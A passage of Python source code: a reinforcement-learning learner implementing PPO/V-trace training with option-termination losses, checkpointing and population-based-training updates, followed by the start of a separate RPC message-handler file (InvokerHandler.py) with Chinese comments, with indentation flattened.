device_buffer = self._copy_train_data_to_device(buffer)
with timing.add_time('squeeze'):
# will squeeze actions only in simple categorical case
tensors_to_squeeze = [
'actions', # 'log_prob_actions',
'policy_version',
'rewards',
'dones',
'rewards_cpu',
'dones_cpu',
]
for tensor_name in tensors_to_squeeze:
device_buffer[tensor_name].squeeze_()
# we no longer need the cached buffer, and can put it back into the pool
self.tensor_batch_pool.put(buffer)
return device_buffer
def _macro_batch_size(self, batch_size):
return self.cfg.num_batches_per_iteration * batch_size
def _process_macro_batch(self, rollouts, batch_size, timing):
macro_batch_size = self._macro_batch_size(batch_size)
assert macro_batch_size % self.cfg.rollout == 0
assert self.cfg.rollout % self.cfg.recurrence == 0
assert macro_batch_size % self.cfg.recurrence == 0
samples = env_steps = 0
for rollout in rollouts:
samples += rollout['length']
env_steps += rollout['env_steps']
with timing.add_time('prepare'):
buffer = self._prepare_train_buffer(rollouts, macro_batch_size, timing)
self.experience_buffer_queue.put((buffer, batch_size, samples, env_steps))
if not self.cfg.benchmark and self.cfg.train_in_background_thread:
# in PyTorch 1.4.0 there is an intense memory spike when the very first batch is being processed
# we wait here until this is over so we can continue queueing more batches onto a GPU without having
# a risk to run out of GPU memory
while self.num_batches_processed < 1:
# log.debug('Waiting for the first batch to be processed')
time.sleep(0.5)
def _process_rollouts(self, rollouts, timing):
# batch_size can potentially change through PBT, so we should keep it the same and pass it around
# using function arguments, instead of using global self.cfg
batch_size = self.cfg.batch_size
rollouts_in_macro_batch = self._macro_batch_size(batch_size) // self.cfg.rollout
if len(rollouts) < rollouts_in_macro_batch:
return rollouts
discard_rollouts = 0
policy_version = self.train_step
for r in rollouts:
rollout_min_version = r['t']['policy_version'].min().item()
if policy_version - rollout_min_version >= self.cfg.max_policy_lag:
discard_rollouts += 1
self._mark_rollout_buffer_free(r)
else:
break
if discard_rollouts > 0:
log.warning(
'Discarding %d old rollouts, cut by policy lag threshold %d (learner %d)',
discard_rollouts,
self.cfg.max_policy_lag,
self.policy_id,
)
rollouts = rollouts[discard_rollouts:]
self.num_discarded_rollouts += discard_rollouts
if len(rollouts) >= rollouts_in_macro_batch:
# process newest rollouts
rollouts_to_process = rollouts[:rollouts_in_macro_batch]
rollouts = rollouts[rollouts_in_macro_batch:]
self._process_macro_batch(rollouts_to_process, batch_size, timing)
# log.info('Unprocessed rollouts: %d (%d samples)', len(rollouts), len(rollouts) * self.cfg.rollout)
return rollouts
def _get_minibatches(self, batch_size, experience_size):
"""Generating minibatches for training."""
assert self.cfg.rollout % self.cfg.recurrence == 0
assert experience_size % batch_size == 0, f'experience size: {experience_size}, batch size: {batch_size}'
if self.cfg.num_batches_per_iteration == 1:
return [None] # single minibatch is actually the entire buffer, we don't need indices
# indices that will start the mini-trajectories from the same episode (for bptt)
indices = np.arange(0, experience_size, self.cfg.recurrence)
indices = np.random.permutation(indices)
# complete indices of mini trajectories, e.g. with recurrence==4: [4, 16] -> [4, 5, 6, 7, 16, 17, 18, 19]
indices = [np.arange(i, i + self.cfg.recurrence) for i in indices]
indices = np.concatenate(indices)
assert len(indices) == experience_size
num_minibatches = experience_size // batch_size
minibatches = np.split(indices, num_minibatches)
return minibatches
@staticmethod
def _get_minibatch(buffer, indices):
if indices is None:
# handle the case of a single batch, where the entire buffer is a minibatch
return buffer
mb = AttrDict()
for item, x in buffer.items():
if isinstance(x, (dict, OrderedDict)):
mb[item] = AttrDict()
for key, x_elem in x.items():
mb[item][key] = x_elem[indices]
else:
mb[item] = x[indices]
return mb
def _should_save_summaries(self):
summaries_every_seconds = self.summary_rate_decay_seconds.at(self.train_step)
if time.time() - self.last_summary_time < summaries_every_seconds:
return False
return True
def _after_optimizer_step(self):
"""A hook to be called after each optimizer step."""
self.train_step += 1
self._maybe_save()
def _maybe_save(self):
if time.time() - self.last_saved_time >= self.cfg.save_every_sec or self.should_save_model:
self._save()
self.model_saved_event.set()
self.should_save_model = False
self.last_saved_time = time.time()
@staticmethod
def checkpoint_dir(cfg, policy_id):
checkpoint_dir = join(experiment_dir(cfg=cfg), f'checkpoint_p{policy_id}')
return ensure_dir_exists(checkpoint_dir)
@staticmethod
def get_checkpoints(checkpoints_dir):
checkpoints = glob.glob(join(checkpoints_dir, 'checkpoint_*'))
return sorted(checkpoints)
def _get_checkpoint_dict(self):
checkpoint = {
'train_step': self.train_step,
'env_steps': self.env_steps,
'model': self.actor_critic.state_dict(),
'optimizer': self.optimizer.state_dict(),
}
if self.aux_loss_module is not None:
checkpoint['aux_loss_module'] = self.aux_loss_module.state_dict()
return checkpoint
def _save(self):
checkpoint = self._get_checkpoint_dict()
assert checkpoint is not None
checkpoint_dir = self.checkpoint_dir(self.cfg, self.policy_id)
tmp_filepath = join(checkpoint_dir, '.temp_checkpoint')
checkpoint_name = f'checkpoint_{self.train_step:09d}_{self.env_steps}.pth'
filepath = join(checkpoint_dir, checkpoint_name)
log.info('Saving %s...', tmp_filepath)
torch.save(checkpoint, tmp_filepath)
log.info('Renaming %s to %s', tmp_filepath, filepath)
os.rename(tmp_filepath, filepath)
while len(self.get_checkpoints(checkpoint_dir)) > self.cfg.keep_checkpoints:
oldest_checkpoint = self.get_checkpoints(checkpoint_dir)[0]
if os.path.isfile(oldest_checkpoint):
log.debug('Removing %s', oldest_checkpoint)
os.remove(oldest_checkpoint)
if self.cfg.save_milestones_sec > 0:
# milestones enabled
if time.time() - self.last_milestone_time >= self.cfg.save_milestones_sec:
milestones_dir = ensure_dir_exists(join(checkpoint_dir, 'milestones'))
milestone_path = join(milestones_dir, f'{checkpoint_name}.milestone')
log.debug('Saving a milestone %s', milestone_path)
shutil.copy(filepath, milestone_path)
self.last_milestone_time = time.time()
@staticmethod
def _policy_loss(ratio, adv, clip_ratio_low, clip_ratio_high):
clipped_ratio = torch.clamp(ratio, clip_ratio_low, clip_ratio_high)
loss_unclipped = ratio * adv
loss_clipped = clipped_ratio * adv
loss = torch.min(loss_unclipped, loss_clipped)
loss = -loss.mean()
return loss
def _value_loss(self, new_values, old_values, target, clip_value):
value_clipped = old_values + torch.clamp(new_values - old_values, -clip_value, clip_value)
value_original_loss = (new_values - target).pow(2)
value_clipped_loss = (value_clipped - target).pow(2)
value_loss = torch.max(value_original_loss, value_clipped_loss)
value_loss = value_loss.mean()
value_loss *= self.cfg.value_loss_coeff
return value_loss
def _termination_loss_func(self, indexed_values, values, terminations):
eps = self.cfg.option_epsilon
option_value = eps * values.mean(dim=1) + (1 - eps) * values.max(dim=1)[0]
grad = indexed_values - option_value + self.cfg.deliberation_cost
term_loss = grad * terminations
term_loss = term_loss.mean() * self.cfg.termination_loss_coeff
return term_loss
def entropy_exploration_loss(self, action_distribution, option_idx):
entropy = action_distribution.entropy().reshape(
-1, self.cfg.num_options) # (B * O) x 1 -> B x O
entropy = self._index_via_option_idx_in_rollout(entropy,
option_idx) # B x O and B x 1 -> B x 1
entropy_loss = -self.cfg.exploration_loss_coeff * entropy.mean()
return entropy_loss
def symmetric_kl_exploration_loss(self, action_distribution, option_idx):
kl_prior = action_distribution.symmetric_kl_with_uniform_prior().reshape(
-1, self.cfg.num_options) # (B * O) x 1 -> B x O
kl_prior = self._index_via_option_idx_in_rollout(kl_prior,
option_idx) # B x O and B x 1 -> B x 1
kl_prior = kl_prior.mean()
if not torch.isfinite(kl_prior):
kl_prior = torch.zeros(kl_prior.shape)
kl_prior = torch.clamp(kl_prior, max=30)
kl_prior_loss = self.cfg.exploration_loss_coeff * kl_prior
return kl_prior_loss
def _prepare_observations(self, obs_tensors, gpu_buffer_obs):
for d, gpu_d, k, v, _ in iter_dicts_recursively(obs_tensors, gpu_buffer_obs):
device, dtype = self.actor_critic.device_and_type_for_input_tensor(k)
tensor = v.detach().to(device, copy=True).type(dtype)
gpu_d[k] = tensor
def _copy_train_data_to_device(self, buffer):
device_buffer = copy_dict_structure(buffer)
for key, item in buffer.items():
if key == 'obs':
self._prepare_observations(item, device_buffer['obs'])
else:
device_tensor = item.detach().to(self.device, copy=True, non_blocking=True)
device_buffer[key] = device_tensor.float()
device_buffer['dones_cpu'] = buffer.dones.to('cpu', copy=True, non_blocking=True).float()
device_buffer['rewards_cpu'] = buffer.rewards.to('cpu', copy=True,
non_blocking=True).float()
return device_buffer
def _train(self, gpu_buffer, batch_size, experience_size, timing):
with torch.no_grad():
early_stopping_tolerance = 1e-6
early_stop = False
prev_epoch_actor_loss = 1e9
epoch_actor_losses = []
# V-trace parameters
# noinspection PyArgumentList
rho_hat = torch.Tensor([self.cfg.vtrace_rho])
# noinspection PyArgumentList
c_hat = torch.Tensor([self.cfg.vtrace_c])
clip_ratio_high = 1.0 + self.cfg.ppo_clip_ratio # e.g. 1.1
# this still works with e.g. clip_ratio = 2, while PPO's 1-r would give negative ratio
clip_ratio_low = 1.0 / clip_ratio_high
clip_value = self.cfg.ppo_clip_value
gamma = self.cfg.gamma
recurrence = self.cfg.recurrence
if self.cfg.with_vtrace:
assert recurrence == self.cfg.rollout and recurrence > 1, \
'V-trace requires to recurrence and rollout to be equal'
num_sgd_steps = 0
stats_and_summaries = None
if not self.with_training:
return stats_and_summaries
for epoch in range(self.cfg.ppo_epochs):
with timing.add_time('epoch_init'):
if early_stop or self.terminate:
break
summary_this_epoch = force_summaries = False
minibatches = self._get_minibatches(batch_size, experience_size)
for batch_num in range(len(minibatches)):
with timing.add_time('minibatch_init'):
indices = minibatches[batch_num]
# current minibatch consisting of short trajectory segments with length == recurrence
mb = self._get_minibatch(gpu_buffer, indices)
# calculate policy head outside of recurrent loop
with timing.add_time('forward_head'):
head_outputs = self.actor_critic.forward_head(mb.obs)
# initial rnn states
with timing.add_time('bptt_initial'):
if self.cfg.use_rnn:
head_output_seq, rnn_states, inverted_select_inds = build_rnn_inputs(
head_outputs, mb.dones_cpu, mb.rnn_states, recurrence,
)
else:
rnn_states = mb.rnn_states[::recurrence]
# calculate RNN outputs for each timestep in a loop
with timing.add_time('bptt'):
if self.cfg.use_rnn:
with timing.add_time('bptt_forward_core'):
core_output_seq, _ = self.actor_critic.forward_core(head_output_seq, rnn_states)
core_outputs = build_core_out_from_seq(core_output_seq,
inverted_select_inds)
else:
core_outputs, _ = self.actor_critic.forward_core(head_outputs, rnn_states)
num_trajectories = head_outputs.size(0) // recurrence
if self.aux_loss_module is not None:
with timing.add_time('aux_loss'):
aux_loss = self.aux_loss_module(
mb.actions.view(num_trajectories, recurrence, -1),
(1.0 - mb.dones).view(num_trajectories, recurrence, 1),
head_outputs.view(num_trajectories, recurrence, -1),
core_outputs.view(num_trajectories, recurrence, -1))
with timing.add_time('tail'):
assert core_outputs.shape[0] == head_outputs.shape[0]
# calculate policy tail outside of recurrent loop
result = self.actor_critic.forward_tail(core_outputs,
with_action_distribution=True)
action_distribution = result.action_distribution
log_prob_actions = action_distribution.log_prob(
mb.actions.reshape(
-1, # B x (num_actions * O) -> (B * O) x num_actions
self.num_actions)).reshape(-1,
self.cfg.num_options) # (B * O) x 1 -> B x O
log_prob_actions = self._index_via_option_idx_in_rollout(
log_prob_actions, mb.option_idx) # B x O, B x 1 -> B x 1
mb.log_prob_actions = self._index_via_option_idx_in_rollout(
mb.log_prob_actions, mb.option_idx) # B x O , B x 1 -> B x 1
ratio = torch.exp(log_prob_actions - mb.log_prob_actions) # pi / pi_old
# super large/small values can cause numerical problems and are probably noise anyway
ratio = torch.clamp(ratio, 0.05, 20.0)
values = self._index_via_option_idx_in_rollout(result.values, mb.option_idx)
with torch.no_grad(
): # these computations are not the part of the computation graph
if self.cfg.with_vtrace:
ratios_cpu = ratio.cpu()
values_cpu = values.cpu()
rewards_cpu = mb.rewards_cpu
dones_cpu = mb.dones_cpu
vtrace_rho = torch.min(rho_hat, ratios_cpu)
vtrace_c = torch.min(c_hat, ratios_cpu)
vs = torch.zeros((num_trajectories * recurrence))
adv = torch.zeros((num_trajectories * recurrence))
next_values = (values_cpu[recurrence - 1::recurrence] -
rewards_cpu[recurrence - 1::recurrence]) / gamma
next_vs = next_values
with timing.add_time('vtrace'):
for i in reversed(range(self.cfg.recurrence)):
rewards = rewards_cpu[i::recurrence]
dones = dones_cpu[i::recurrence]
not_done = 1.0 - dones
not_done_times_gamma = not_done * gamma
curr_values = values_cpu[i::recurrence]
curr_vtrace_rho = vtrace_rho[i::recurrence]
curr_vtrace_c = vtrace_c[i::recurrence]
delta_s = curr_vtrace_rho * (
rewards + not_done_times_gamma * next_values - curr_values)
adv[i::recurrence] = curr_vtrace_rho * (
rewards + not_done_times_gamma * next_vs - curr_values)
next_vs = curr_values + delta_s + not_done_times_gamma * curr_vtrace_c * (
next_vs - next_values)
vs[i::recurrence] = next_vs
next_values = curr_values
targets = vs
else:
# using regular GAE
adv = mb.advantages
targets = mb.returns
adv_mean = adv.mean()
adv_std = adv.std()
adv = (adv - adv_mean) / max(1e-3, adv_std) # normalize advantage
adv = adv.to(self.device)
with timing.add_time('losses'):
policy_loss = self._policy_loss(ratio, adv, clip_ratio_low, clip_ratio_high)
exploration_loss = self.exploration_loss_func(action_distribution,
mb.option_idx)
indexed_termination = self._index_via_option_idx_in_rollout(
result.termination_mask, mb.option_idx)
termination_loss = self._termination_loss_func(values,
result.values,
indexed_termination)
actor_loss = policy_loss + exploration_loss + termination_loss
epoch_actor_losses.append(actor_loss.item())
targets = targets.to(self.device)
old_values = mb.values
value_loss = self._value_loss(values, old_values, targets, clip_value)
critic_loss = value_loss
loss = actor_loss + critic_loss
high_loss = 30.0
if abs(to_scalar(policy_loss)) > high_loss or abs(
to_scalar(value_loss)) > high_loss or abs(
to_scalar(exploration_loss)) > high_loss:
log.warning(
'High loss value: %.4f %.4f %.4f %.4f (recommended to adjust the --reward_scale parameter)',
to_scalar(loss),
to_scalar(policy_loss),
to_scalar(value_loss),
to_scalar(exploration_loss),
)
force_summaries = True
if self.aux_loss_module is not None:
loss = loss + aux_loss
# update the weights
with timing.add_time('update'):
# following advice from https://youtu.be/9mS1fIYj1So set grad to None instead of optimizer.zero_grad()
for p in self.actor_critic.parameters():
p.grad = None
if self.aux_loss_module is not None:
for p in self.aux_loss_module.parameters():
p.grad = None
loss.backward()
if self.cfg.max_grad_norm > 0.0:
with timing.add_time('clip'):
torch.nn.utils.clip_grad_norm_(self.actor_critic.parameters(),
self.cfg.max_grad_norm)
if self.aux_loss_module is not None:
torch.nn.utils.clip_grad_norm_(self.aux_loss_module.parameters(),
self.cfg.max_grad_norm)
curr_policy_version = self.train_step # policy version before the weight update
with self.policy_lock:
self.optimizer.step()
num_sgd_steps += 1
with torch.no_grad():
with timing.add_time('after_optimizer'):
self._after_optimizer_step()
# collect and report summaries
with_summaries = self._should_save_summaries() or force_summaries
if with_summaries and not summary_this_epoch:
stats_and_summaries = self._record_summaries(AttrDict(locals()))
summary_this_epoch = True
force_summaries = False
# end of an epoch
# this will force policy update on the inference worker (policy worker)
self.policy_versions[self.policy_id] = self.train_step
new_epoch_actor_loss = np.mean(epoch_actor_losses)
loss_delta_abs = abs(prev_epoch_actor_loss - new_epoch_actor_loss)
if loss_delta_abs < early_stopping_tolerance:
early_stop = True
log.debug(
'Early stopping after %d epochs (%d sgd steps), loss delta %.7f',
epoch + 1,
num_sgd_steps,
loss_delta_abs,
)
break
prev_epoch_actor_loss = new_epoch_actor_loss
epoch_actor_losses = []
return stats_and_summaries
def _record_summaries(self, train_loop_vars):
var = train_loop_vars
self.last_summary_time = time.time()
stats = AttrDict()
grad_norm = sum(
p.grad.data.norm(2).item()**2
for p in self.actor_critic.parameters()
if p.grad is not None)**0.5
stats.grad_norm = grad_norm
stats.loss = var.loss
stats.value = var.result.values.mean()
stats.entropy = var.action_distribution.entropy().mean()
stats.policy_loss = var.policy_loss
stats.value_loss = var.value_loss
stats.termination_loss = var.termination_loss
stats.exploration_loss = var.exploration_loss
if self.aux_loss_module is not None:
stats.aux_loss = var.aux_loss
stats.adv_min = var.adv.min()
stats.adv_max = var.adv.max()
stats.adv_std = var.adv_std
reshaped_action_logits = var.mb.action_logits.reshape(-1,
self.num_action_logits,
self.cfg.num_options).permute(
0, 2, 1)
indexed_action_logits = self._index_via_option_idx_in_rollout(reshaped_action_logits,
var.mb.option_idx).squeeze()
stats.max_abs_logprob = torch.abs(indexed_action_logits).max()
if hasattr(var.action_distribution, 'summaries'):
stats.update(var.action_distribution.summaries())
if var.epoch == self.cfg.ppo_epochs - 1 and var.batch_num == len(var.minibatches) - 1:
# we collect these stats only for the last PPO batch, or every time if we're only doing one batch, IMPALA-style
ratio_mean = torch.abs(1.0 - var.ratio).mean().detach()
ratio_min = var.ratio.min().detach()
ratio_max = var.ratio.max().detach()
# log.debug('Learner %d ratio mean min max %.4f %.4f %.4f', self.policy_id, ratio_mean.cpu().item(), ratio_min.cpu().item(), ratio_max.cpu().item())
value_delta = torch.abs(var.values - var.old_values)
value_delta_avg, value_delta_max = value_delta.mean(), value_delta.max()
# calculate KL-divergence with the behaviour policy action distribution
old_action_distribution = get_action_distribution(self.actor_critic.action_space,
reshaped_action_logits.permute(
0, 2, 1),
num_options=self.cfg.num_options)
kl_old = var.action_distribution.kl_divergence(old_action_distribution)
kl_old_mean = kl_old.mean()
stats.kl_divergence = kl_old_mean
stats.value_delta = value_delta_avg
stats.value_delta_max = value_delta_max
stats.fraction_clipped = ((var.ratio < var.clip_ratio_low).float() +
(var.ratio > var.clip_ratio_high).float()).mean()
stats.ratio_mean = ratio_mean
stats.ratio_min = ratio_min
stats.ratio_max = ratio_max
stats.num_sgd_steps = var.num_sgd_steps
# this caused numerical issues on some versions of PyTorch with second moment reaching infinity
adam_max_second_moment = 0.0
for key, tensor_state in self.optimizer.state.items():
adam_max_second_moment = max(tensor_state['exp_avg_sq'].max().item(),
adam_max_second_moment)
stats.adam_max_second_moment = adam_max_second_moment
version_diff = var.curr_policy_version - var.mb.policy_version
stats.version_diff_avg = version_diff.mean()
stats.version_diff_min = version_diff.min()
stats.version_diff_max = version_diff.max()
for key, value in stats.items():
stats[key] = to_scalar(value)
return stats
def _update_pbt(self):
"""To be called from the training loop, same thread that updates the model!"""
with self.pbt_mutex:
if self.load_policy_id is not None:
assert self.cfg.with_pbt
log.debug('Learner %d loads policy from %d', self.policy_id, self.load_policy_id)
self.load_from_checkpoint(self.load_policy_id)
self.load_policy_id = None
if self.new_cfg is not None:
for key, value in self.new_cfg.items():
if self.cfg[key] != value:
log.debug('Learner %d replacing cfg parameter %r with new value %r',
self.policy_id,
key,
value)
self.cfg[key] = value
for param_group in self.optimizer.param_groups:
param_group['lr'] = self.cfg.learning_rate
param_group['betas'] = (self.cfg.adam_beta1, self.cfg.adam_beta2)
log.debug('Updated optimizer lr to value %.7f, betas: %r',
param_group['lr'],
param_group['betas'])
self.new_cfg = None
@staticmethod
def load_checkpoint(checkpoints, device):
if len(checkpoints) <= 0:
log.warning('No checkpoints found')
return None
else:
latest_checkpoint = checkpoints[-1]
# extra safety mechanism to recover from spurious filesystem errors
num_attempts = 3
for attempt in range(num_attempts):
try:
log.warning('Loading state from checkpoint %s...', latest_checkpoint)
checkpoint_dict = torch.load(latest_checkpoint, map_location=device)
return checkpoint_dict
except Exception:
log.exception(f'Could not load from checkpoint, attempt {attempt}')
def _load_state(self, checkpoint_dict, load_progress=True):
if load_progress:
self.train_step = checkpoint_dict['train_step']
self.env_steps = checkpoint_dict['env_steps']
self.actor_critic.load_state_dict(checkpoint_dict['model'])
self.optimizer.load_state_dict(checkpoint_dict['optimizer'])
if self.aux_loss_module is not None:
self.aux_loss_module.load_state_dict(checkpoint_dict['aux_loss_module'])
log.info('Loaded experiment state at training iteration %d, env step %d',
self.train_step,
self.env_steps)
def init_model(self, timing):
self.actor_critic = create_actor_critic(self.cfg, self.obs_space, self.action_space, timing)
self.actor_critic.model_to_device(self.device)
self.actor_critic.share_memory()
if self.cfg.use_cpc:
self.aux_loss_module = CPCA(self.cfg, self.action_space)
if self.aux_loss_module is not None:
self.aux_loss_module.to(device=self.device)
def load_from_checkpoint(self, policy_id):
checkpoints = self.get_checkpoints(self.checkpoint_dir(self.cfg, policy_id))
checkpoint_dict = self.load_checkpoint(checkpoints, self.device)
if checkpoint_dict is None:
log.debug('Did not load from checkpoint, starting from scratch!')
else:
log.debug('Loading model from checkpoint')
# if we're replacing our policy with another policy (under PBT), let's not reload the env_steps
load_progress = policy_id == self.policy_id
self._load_state(checkpoint_dict, load_progress=load_progress)
def initialize(self, timing):
with timing.timeit('init'):
# initialize the Torch modules
if self.cfg.seed is None:
log.info('Starting seed is not provided')
else:
log.info('Setting fixed seed %d', self.cfg.seed)
torch.manual_seed(self.cfg.seed)
np.random.seed(self.cfg.seed)
# this does not help with a single experiment
# but seems to do better when we're running more than one experiment in parallel
torch.set_num_threads(1)
if self.cfg.device == 'gpu':
torch.backends.cudnn.benchmark = True
# we should already see only one CUDA device, because of env vars
assert torch.cuda.device_count() == 1
self.device = torch.device('cuda', index=0)
else:
self.device = torch.device('cpu')
self.init_model(timing)
params = list(self.actor_critic.parameters())
if self.aux_loss_module is not None:
params += list(self.aux_loss_module.parameters())
self.optimizer = torch.optim.Adam(
params,
self.cfg.learning_rate,
betas=(self.cfg.adam_beta1, self.cfg.adam_beta2),
eps=self.cfg.adam_eps,
)
self.load_from_checkpoint(self.policy_id)
self._broadcast_model_weights() # sync the very first version of the weights
self.train_thread_initialized.set()
def _process_training_data(self, data, timing, wait_stats=None):
self.is_training = True
buffer, batch_size, samples, env_steps = data
assert samples == batch_size * self.cfg.num_batches_per_iteration
self.env_steps += env_steps
experience_size = buffer.rewards.shape[0]
stats = dict(learner_env_steps=self.env_steps, policy_id=self.policy_id)
with timing.add_time('train'):
discarding_rate = self._discarding_rate()
self._update_pbt()
train_stats = self._train(buffer, batch_size, experience_size, timing)
if train_stats is not None:
stats['train'] = train_stats
if wait_stats is not None:
wait_avg, wait_min, wait_max = wait_stats
stats['train']['wait_avg'] = wait_avg
stats['train']['wait_min'] = wait_min
stats['train']['wait_max'] = wait_max
stats['train']['discarded_rollouts'] = self.num_discarded_rollouts
stats['train']['discarding_rate'] = discarding_rate
stats['stats'] = memory_stats('learner', self.device)
self.is_training = False
try:
safe_put(self.report_queue, stats, queue_name='report')
except Full:
log.warning('Could not report training stats, the report queue is full!')
def _train_loop(self):
timing = Timing()
self.initialize(timing)
wait_times = deque([], maxlen=self.cfg.num_workers)
last_cache_cleanup = time.time()
while not self.terminate:
with timing.timeit('train_wait'):
data = safe_get(self.experience_buffer_queue)
if self.terminate:
break
wait_stats = None
wait_times.append(timing.train_wait)
if len(wait_times) >= wait_times.maxlen:
wait_times_arr = np.asarray(wait_times)
wait_avg = np.mean(wait_times_arr)
wait_min, wait_max = wait_times_arr.min(), wait_times_arr.max()
# log.debug(
# 'Training thread had to wait %.5f s for the new experience buffer (avg %.5f)',
# timing.train_wait, wait_avg,
# )
wait_stats = (wait_avg, wait_min, wait_max)
self._process_training_data(data, timing, wait_stats)
self.num_batches_processed += 1
if time.time() - last_cache_cleanup > 300.0 or (not self.cfg.benchmark and
self.num_batches_processed < 50):
if self.cfg.device == 'gpu':
torch.cuda.empty_cache()
torch.cuda.ipc_collect()
last_cache_cleanup = time.time()
time.sleep(0.3)
log.info('Train loop timing: %s', timing)
del self.actor_critic
del self.device
def _experience_collection_rate_stats(self):
now = time.time()
if now - self.discarded_experience_timer > 1.0:
self.discarded_experience_timer = now
self.discarded_experience_over_time.append((now, self.num_discarded_rollouts))
def _discarding_rate(self):
if len(self.discarded_experience_over_time) <= 1:
return 0
first, last = self.discarded_experience_over_time[0], self.discarded_experience_over_time[-1]
delta_rollouts = last[1] - first[1]
delta_time = last[0] - first[0]
discarding_rate = delta_rollouts / (delta_time + EPS)
return discarding_rate
def _extract_rollouts(self, data):
data = AttrDict(data)
worker_idx, split_idx, traj_buffer_idx = data.worker_idx, data.split_idx, data.traj_buffer_idx
rollouts = []
for rollout_data in data.rollouts:
env_idx, agent_idx = rollout_data['env_idx'], rollout_data['agent_idx']
tensors = self.rollout_tensors.index(
(worker_idx, split_idx, env_idx, agent_idx, traj_buffer_idx))
rollout_data['t'] = tensors
rollout_data['worker_idx'] = worker_idx
rollout_data['split_idx'] = split_idx
rollout_data['traj_buffer_idx'] = traj_buffer_idx
rollouts.append(AttrDict(rollout_data))
return rollouts
def _process_pbt_task(self, pbt_task):
task_type, data = pbt_task
with self.pbt_mutex:
if task_type == PbtTask.SAVE_MODEL:
policy_id = data
assert policy_id == self.policy_id
self.should_save_model = True
elif task_type == PbtTask.LOAD_MODEL:
policy_id, new_policy_id = data
assert policy_id == self.policy_id
assert new_policy_id is not None
self.load_policy_id = new_policy_id
elif task_type == PbtTask.UPDATE_CFG:
policy_id, new_cfg = data
assert policy_id == self.policy_id
self.new_cfg = new_cfg
def _accumulated_too_much_experience(self, rollouts):
max_minibatches_to_accumulate = self.cfg.num_minibatches_to_accumulate
if max_minibatches_to_accumulate == -1:
# default value
max_minibatches_to_accumulate = 2 * self.cfg.num_batches_per_iteration
# allow the max batches to accumulate, plus the minibatches we're currently training on
max_minibatches_on_learner = max_minibatches_to_accumulate + self.cfg.num_batches_per_iteration
minibatches_currently_training = int(self.is_training) * self.cfg.num_batches_per_iteration
rollouts_per_minibatch = self.cfg.batch_size / self.cfg.rollout
# count contribution from unprocessed rollouts
minibatches_currently_accumulated = len(rollouts) / rollouts_per_minibatch
# count minibatches ready for training
minibatches_currently_accumulated += self.experience_buffer_queue.qsize(
) * self.cfg.num_batches_per_iteration
total_minibatches_on_learner = minibatches_currently_training + minibatches_currently_accumulated
return total_minibatches_on_learner >= max_minibatches_on_learner
def _run(self):
# workers should ignore Ctrl+C because the termination is handled in the event loop by a special msg
signal.signal(signal.SIGINT, signal.SIG_IGN)
try:
psutil.Process().nice(self.cfg.default_niceness)
except psutil.AccessDenied:
log.error('Low niceness requires sudo!')
if self.cfg.device == 'gpu':
cuda_envvars_for_policy(self.policy_id, 'learner')
torch.multiprocessing.set_sharing_strategy('file_system')
torch.set_num_threads(self.cfg.learner_main_loop_num_cores)
timing = Timing()
rollouts = []
if self.train_in_background:
self.training_thread.start()
else:
self.initialize(timing)
log.error(
'train_in_background set to False on learner %d! This is slow, use only for testing!',
self.policy_id,
)
while not self.terminate:
while True:
try:
tasks = self.task_queue.get_many(timeout=0.005)
for task_type, data in tasks:
if task_type == TaskType.TRAIN:
with timing.add_time('extract'):
rollouts.extend(self._extract_rollouts(data))
# log.debug('Learner %d has %d rollouts', self.policy_id, len(rollouts))
elif task_type == TaskType.INIT:
self._init()
elif task_type == TaskType.TERMINATE:
time.sleep(0.3)
log.info('GPU learner timing: %s', timing)
self._terminate()
break
elif task_type == TaskType.PBT:
self._process_pbt_task(data)
except Empty:
break
if self._accumulated_too_much_experience(rollouts):
# if we accumulated too much experience, signal the policy workers to stop experience collection
if not self.stop_experience_collection[self.policy_id]:
self.stop_experience_collection_num_msgs += 1
# TODO: add a logger function for this
if self.stop_experience_collection_num_msgs >= 50:
log.info(
'Learner %d accumulated too much experience, stop experience collection! '
'Learner is likely a bottleneck in your experiment (%d times)',
self.policy_id,
self.stop_experience_collection_num_msgs,
)
self.stop_experience_collection_num_msgs = 0
self.stop_experience_collection[self.policy_id] = True
elif self.stop_experience_collection[self.policy_id]:
# otherwise, resume the experience collection if it was stopped
self.stop_experience_collection[self.policy_id] = False
with self.resume_experience_collection_cv:
self.resume_experience_collection_num_msgs += 1
if self.resume_experience_collection_num_msgs >= 50:
log.debug('Learner %d is resuming experience collection!', self.policy_id)
self.resume_experience_collection_num_msgs = 0
self.resume_experience_collection_cv.notify_all()
with torch.no_grad():
rollouts = self._process_rollouts(rollouts, timing)
if not self.train_in_background:
while not self.experience_buffer_queue.empty():
training_data = self.experience_buffer_queue.get()
self._process_training_data(training_data, timing)
self._experience_collection_rate_stats()
if self.train_in_background:
self.experience_buffer_queue.put(None)
self.training_thread.join()
def init(self):
self.task_queue.put((TaskType.INIT, None))
self.initialized_event.wait()
def save_model(self, timeout=None):
self.model_saved_event.clear()
save_task = (PbtTask.SAVE_MODEL, self.policy_id)
self.task_queue.put((TaskType.PBT, save_task))
log.debug('Wait while learner %d saves the model...', self.policy_id)
if self.model_saved_event.wait(timeout=timeout):
log.debug('Learner %d saved the model!', self.policy_id)
else:
log.warning('Model saving request timed out!')
self.model_saved_event.clear()
def close(self):
self.task_queue.put((TaskType.TERMINATE, None))
def join(self):
join_or_kill(self.process)
|
InvokerHandler.py
|
'''
Created on 2015年7月12日
@author: sunshyran
'''
from rpc.framework.driver.MessageDriver import AbstractMessageDriver
from rpc.framework.driver.MessageThread import MessageFullError, StopError, \
MessageEmptyError, MessageThread
from rpc.framework.channel.ChannelError import ChannelBrokenError, \
ChannelClosedError, ChannelDataError
from rpc.framework.exception.HandlerError import HandlerBusyError, \
HandlerStopError
from rpc.framework.log.RPCLog import RPCLog
class InvokerHandler(AbstractMessageDriver):
'''
\ 支持异步的RPC消息处理者。 一方面负责自动将消息从这端发送出去,另一方面负责自动从对端接收RPC消息
\ 内部通过引入两个线程以及对应的消息队列,实现消息的发送和接收并行。
'''
DEFAULT_TIMEOUT = None
def __init__(self, channel):
super().__init__()
self.channel = channel
self.invoking_thread = MessageThread(target=self.__dealing_invoker, name='invoking')
self.retrieving_thread = MessageThread(target=self.__receive_invoker, name='retrieving')
self.isrunning = False;
def startup(self):
'''
@see MessageDriver.AbstractMessageDriver#startup
'''
print("MessageHandler startup")
self.isrunning = True
self.invoking_thread.start()
self.retrieving_thread.start()
def shutdown(self):
'''
@see MessageDriver.AbstractMessageDriver#shutdown
<p>内部在停止消息队列之前,会先停止channel</p>
'''
print("MessageHandler shutdown")
# 必须先停止依赖的数据通道,然后才能停止发送和接收线程
self.isrunning = False
self.channel.close()
self.invoking_thread.stopAndWait()
